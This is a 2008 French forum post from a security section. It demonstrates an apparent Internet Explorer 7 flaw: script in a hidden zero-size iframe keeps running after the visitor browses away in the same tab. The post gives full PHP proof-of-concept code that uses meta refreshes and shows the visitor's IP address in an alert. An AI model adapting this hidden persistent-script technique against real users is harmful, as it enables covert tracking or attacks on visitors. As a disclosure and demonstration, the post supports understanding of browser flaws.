Faille IE 7

Moderator: Mod

Faille IE 7

Postby Dededede4 » Sun Aug 24, 2008 10:55 am

Je vous présente une faille d'IE 7...

Pas trop dangereuse, mais... disons que c'est toujours bon a savoir :)

Un code javascript est exécuter même quand on quitte la page.

Il suffi de rester sur l'onglet du site.

Exemple : http://dex4.idoo.com/hack.php

Le code php :

[code:1:bcf644c6e6]<?
$frame = $_GET["frame"];
if($frame == 1) echo "<html><head><meta http-equiv=\"refresh\" content=\"1; url=?frame=2\" /></head></html>";
if($frame == 2 or $frame == 3) {
$ra = $_SERVER["REMOTE_ADDR"];
?>
<html>
<head>
<script type="text/javascript">
<? if($frame == 3) echo "alert(\"Salut $ra ! Ceci est une faille de sécurité, Internet Explorer 7 est toujours connectée cher dede !\");"; ?>
</script>
<meta http-equiv="refresh" content="10; url=?frame=3" />
</head>
</html>
<?
} else {
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>
Faille de sécurité Internet Explorer 7 ?
</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
</head>
<body>
Visiter d'autres site à partir de cet onglet...
<iframe src="?frame=1" width="0" height="0"></iframe>
</body>
</html>
<?
}
?>[/code:1:bcf644c6e6]

Rappel: IE 7 est installer sur tout les vista ( par défaut )...
Dededede4
Projets
 
Posts: 50
Joined: Tue Jun 03, 2008 12:54 pm

Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 2 guests

cron